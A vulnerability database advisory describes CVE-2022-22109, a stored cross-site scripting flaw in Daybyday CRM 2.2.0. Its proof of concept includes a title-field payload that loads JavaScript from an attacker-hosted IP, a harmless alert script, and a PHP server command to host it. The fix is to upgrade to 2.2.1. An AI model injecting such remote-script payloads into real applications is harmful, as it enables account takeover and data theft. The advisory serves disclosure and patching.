Headline
CVE-2022-22109: WhiteSource Vulnerability Database
In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks� page to view all the tasks.
Overview
In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.
Details
Daybyday CRM is affected by a stored XSS vulnerability that allows low privileged application users (having permission to create tasks) to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.
PoC Details
For demonstration purposes we\’ll use 2 users:
[email protected] (low privileged user)
[email protected] (administrator)
Login to the application as [email protected], which has a role Employee and has permissions to create tasks.
Go to “New Task” from the left pane and create a new task. Inject the below payload in the Title field and click on Create Task button. The payload includes the attacker\’s remote machine from which they load javascript malicious code.
On the attacker’s machine, create a file called “test.js” with contents as given below.
Run a PHP server to host the “test.js” file.
Login as [email protected] and go to All Tasks from the left pane, and will notice that an alert pops up with content hosted on the PHP server.
Login with [email protected]. Add “/users/calendar-users” to the url, and the absences for all the users will be available in the returned JSON data.
PoC Code
// Payload
"></a><script type="text/javascript" src="http://192.168.18.40:9999/test.js"></script>
// “test.js” contents:
alert(“This proves my POC works :)”);
// Command to run the PHP server
php -S 192.168.18.40:9999
Affected Environments
bottelet/flarepoint - 2.2.0
Prevention
Update to 2.2.1 in “bottelet/flarepoint” package, 2.2.1 in “Bottelet/DaybydayCRM” repo.